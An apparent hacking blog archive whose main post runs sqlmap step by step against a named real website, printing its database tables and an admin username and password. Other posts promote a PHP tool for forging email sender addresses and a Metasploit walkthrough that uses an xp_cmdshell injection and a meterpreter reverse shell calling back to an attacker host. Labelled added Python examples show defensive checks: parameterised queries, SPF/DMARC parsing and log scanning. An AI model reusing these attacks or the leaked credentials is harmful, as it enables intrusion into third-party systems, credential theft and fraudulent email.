Wednesday, 4 February 2015

Visit my new website

Hello everyone... sorry...
Because I am going to stop all updates on this blog, but I have launched my new website related to hacking tricks, with a new name, new team and new tricks.

Please...
Visit my new website

http://secret-hacker.com

contact me here
----------------------------------------------------------
mr.akshayborase@gmail.com
----------------------------------------------------------

Thursday, 20 February 2014

SQL injection with SQLMAP Tool

SQLMAP-->

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


First, look for an SQL injection vulnerability in the target website.

target-->www.tsbuttons.com.bd 

Now find the SQL injection vulnerability in the target website.
Ohh, I found it...
vulnerability-->tsbuttons.com.bd/jean_tack_buttons.php?ptid=20'


This is the error shown on the website:
---------------------------------------------
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---------------------------------------------

Now start the game (hack the target site).

1. Open sqlmap:

root@kali:~# sqlmap --help
2. Find out the database names of the target website:

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 --dbs

Output:
----------------------------------------
available databases [2]:
[*] information_schema
[*] tsbutton_db
---------------------------------------


3. List the tables of the database:

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db --tables

Output:
--------------------------------------------------------------------------------------------------------
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database: tsbutton_db
[4 tables]
+--------------+
| news         |
| product      |
| product_type |
| users        |
+--------------+
---------------------------------------------------------------------------------------------------------

4. Now it is time to list the columns of the tables we fetched from the database:

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users --columns

Output:
--------------------------------------------------------
Database: tsbutton_db
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| name     | varchar(25)  |
| Password | varchar(255) |
| type     | int(4)       |
| userid   | int(25)      |
| username | varchar(25)  |
+----------+--------------+
-------------------------------------------------------


5. Fetch the username:

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C username --dump

Yehh!
We got the username of the target website:
username-->admin


6. Let's fetch the password:

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C password --dump

Finally, the game is over.

--------------------------------------------------------------
username-->admin
password-->water
-------------------------------------------------------------
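As an added example (not from the post), the query-building pattern behind the MySQL syntax error shown above, beside the parameterised form that closes the hole. The product_type table and its columns are assumptions, built in an in-memory SQLite database rather than the site's MySQL, but the behaviour on a trailing quote is the same.

```python
import sqlite3

# Constructed in-memory stand-in for the lookup behind
# jean_tack_buttons.php?ptid=...; table and column names are assumptions.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE product_type (ptid INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO product_type VALUES (?, ?)",
                 [(20, "jean tack buttons"), (21, "snap buttons")])
conn.commit()


def lookup_vulnerable(ptid: str):
    """Builds the query by string concatenation, the pattern sqlmap detects:
    a stray quote reaches the SQL parser and raises a syntax error."""
    sql = "SELECT name FROM product_type WHERE ptid = " + ptid
    return conn.execute(sql).fetchall()


def lookup_safe(ptid: str):
    """Parameterised query: the value never reaches the SQL parser, so a quote
    is just data and the lookup returns no row instead of an error."""
    sql = "SELECT name FROM product_type WHERE ptid = ?"
    return conn.execute(sql, (ptid,)).fetchall()


def probe(ptid: str) -> dict:
    """Runs both versions on the same input and reports what each did."""
    result = {}
    try:
        result["vulnerable"] = lookup_vulnerable(ptid)
    except sqlite3.OperationalError as e:
        result["vulnerable"] = f"error: {e}"   # the tell-tale SQL error page
    result["safe"] = lookup_safe(ptid)
    return result


if __name__ == "__main__":
    for value in ("20", "20'"):
        print(repr(value), probe(value))
```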

Tuesday, 11 June 2013

Email spoofing

Email spoofing is the creation of email messages with a forged sender address - something which is simple to do because the core SMTP protocols do no authentication. Spam and phishing emails typically use such spoofing to mislead the recipient about the origin of the message.
A number of measures to address spoofing are available, including SPF, Sender ID, DKIM, and DMARC. Although their use is increasing, it is likely that almost half of all domains still do not have such measures in place.
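A check a defender can run on the measures just named, added here as an example that is not part of the post: parse SPF and DMARC TXT records and classify how far a domain resists a forged sender address. The records and domain names below are constructed placeholders; nothing is queried over the network.

```python
import re

# Constructed DNS TXT answers standing in for a lookup of "<domain>" and
# "_dmarc.<domain>"; placeholder domains, not records of any real site.
TXT_RECORDS = {
    "example.com": ["v=spf1 ip4:192.0.2.0/24 include:_spf.mail.example -all"],
    "_dmarc.example.com": ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"],
    "weak.example": ["v=spf1 include:_spf.mail.example ?all"],
    # weak.example publishes no _dmarc record at all
}


def parse_spf(txts):
    """Returns the SPF 'all' qualifier ('-', '~', '?', '+'), 'none' if the
    record has no all mechanism, or None when there is no SPF record."""
    for txt in txts:
        if txt.lower().startswith("v=spf1"):
            m = re.search(r"(?:^|\s)([-~?+]?)all(?:\s|$)", txt)
            if m:
                return m.group(1) or "+"   # a bare 'all' means +all
            return "none"
    return None


def parse_dmarc(txts):
    """Returns the DMARC tags as a dict, or None if no DMARC record exists."""
    for txt in txts:
        if txt.upper().startswith("V=DMARC1"):
            tags = {}
            for part in txt.split(";"):
                if "=" in part:
                    k, v = part.split("=", 1)
                    tags[k.strip().lower()] = v.strip()
            return tags
    return None


def spoofing_posture(domain, records=TXT_RECORDS):
    """Classifies how a receiver that checks SPF and DMARC would treat a
    message whose From: domain is forged to this domain."""
    spf = parse_spf(records.get(domain, []))
    dmarc = parse_dmarc(records.get(f"_dmarc.{domain}", []))
    policy = (dmarc or {}).get("p", "none").lower()
    if policy in ("reject", "quarantine"):
        return "enforced"        # DMARC makes SPF/DKIM failures actionable
    if spf is None and dmarc is None:
        return "unprotected"     # nothing for the receiver to check
    return "partial"             # records exist but nothing gets rejected
```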


First of all, download the EmailSpoofer.php file.

Upload the files to any free web hosting server. Some free web hosting servers are given below; you can also find a few more for yourself.
  • http://www.serversfree.com/
  • http://www.yourfreehosting.net/ 
  • http://www.esmartstart.com/ 
  • http://www.110mb.com/ 
  • http://www.drivehq.com/ 
  • http://www.t35.com/
  • http://www.my3gb.com/
Then open the EmailSpoofer.php file and you get the fake mail sender application.



Fake mail from Bill Gates (screenshot)



warning
------------------------------------------------------------------------------------------------------------------------
You may use this script for educational purposes only.
I cannot be held responsible for any legal action or other action taken against you because of use of this script.
Use at your own risk.

no one is untraceable
------------------------------------------------------------------------------------------------------------------------


Sunday, 5 May 2013

Recon-ng: Web Reconnaissance framework for penetration testers

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. 


Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!

How to use? The complete guide is available here.

Recon-ng repository
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Saturday, 4 May 2013

New penetration testing framework (pentbox-1.5)


--------- Menu--------------

1- Cryptography tools
2- Network tools
3- Web
4- License and contact
5- Exit
------------------------------

Download Pentbox-1.5

Monday, 18 February 2013

Exploiting SQL injection vulnerabilities with Metasploit (Part-2)

Recently we were performing a web application penetration test for one of our clients and identified a SQL injection vulnerability. The vulnerability allowed us to conduct a degree of fingerprinting on the remote server; however, the Microsoft SQL Server back-end database didn't allow executing commands via the well-known xp_cmdshell stored procedure.

Based on the fingerprinting information we identified that the database server was running an old and vulnerable version of MS SQL Server. Microsoft SQL Server 2000 SP3, to be precise.
All indicated that the server was vulnerable to the MS09-004 vulnerability. However, it was not possible to get direct access to the database. Moreover, no authentication credentials were discovered during the course of the assessment.

This is how our newly released Metasploit module was born. We coded an extension which can be added to Metasploit to exploit this vulnerability through a SQL injection vulnerability with no need for credentials, as the web application will authenticate on our behalf.

Penetration testing - SQL injection exploitation (screenshot)


The screenshot above shows how to get meterpreter (or any other payload of your choice) exploiting the vulnerability from Metasploit.

Tuesday, 29 January 2013

Exploiting SQL injection vulnerabilities with Metasploit (Part-1)

In this post we are going to show how to exploit a SQL injection vulnerability on a web application with a Microsoft SQL Server backend where xp_cmdshell is available to the attacker. During a penetration test of a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:
http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell 'ping 192.168.1.64';--
If the request shown above is successful then arbitrary commands can be executed on the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could help the attacker automate the takeover process. This post will cover the use of a Metasploit module.

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by setting the GET_PATH variable with an [SQLi] token. The token marks the place where the payload will be injected. The rest of the exploitation process is the same as for any other vulnerability; this is the exploitation based on the URL shown above:

msf > use windows/mssql/mssql_payload_sqli

msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/showproduct.asp?id=1;[SQLi];--
GET_PATH => http://192.168.1.66/showproduct.asp?id=1;[SQLi];--

msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66
RHOST => 192.168.1.66

msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64
LHOST => 192.168.1.64

msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80

msf exploit(mssql_payload_sqli) > exploit

After the exploitation the attacker will get a meterpreter shell.

SQL injection exploitation with Metasploit (screenshot)
If you want to use this code you can download it from Secforce security tools repository.
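From the defender's side, as an added example that is not part of the post: the injection shown in the URL above leaves a recognisable trace in web-server logs, and this scans IIS-style log lines for stacked-query xp_cmdshell patterns. The log format and lines are constructed (the addresses mirror the lab IPs above); a WAF or SIEM rule would key on the same indicators.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines in a W3C-like form:
# date time client-ip method uri query status
LOG_LINES = [
    "2013-01-29 10:02:11 192.168.1.64 GET /showproduct.asp id=1 200",
    "2013-01-29 10:02:15 192.168.1.64 GET /showproduct.asp "
    "id=1;exec+master..xp_cmdshell+'ping+192.168.1.64';-- 200",
    "2013-01-29 10:02:19 192.168.1.64 GET /showproduct.asp "
    "id=1%3Bexec%20master..xp_cmdshell%20%27dir%27%3B-- 500",
    "2013-01-29 10:03:02 192.168.1.70 GET /showproduct.asp id=42 200",
]

# Indicators of the MSSQL stacked-query injection used in the post.
STACKED_EXEC = re.compile(r";\s*exec(?:ute)?\b", re.IGNORECASE)
XP_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
COMMENT_TAIL = re.compile(r"--\s*$")


def classify_query(query: str) -> list:
    """Returns the indicators found in one query string after URL decoding,
    so percent-encoded and plus-encoded variants are treated alike."""
    q = unquote_plus(query)
    found = []
    if STACKED_EXEC.search(q):
        found.append("stacked-exec")
    if XP_CMDSHELL.search(q):
        found.append("xp_cmdshell")
    if COMMENT_TAIL.search(q):
        found.append("comment-terminated")
    return found


def scan(lines) -> list:
    """Returns (client_ip, uri, indicators) for every line with a hit."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue          # malformed line, skip rather than crash
        ip, uri, query = fields[2], fields[4], fields[5]
        indicators = classify_query(query)
        if indicators:
            hits.append((ip, uri, indicators))
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```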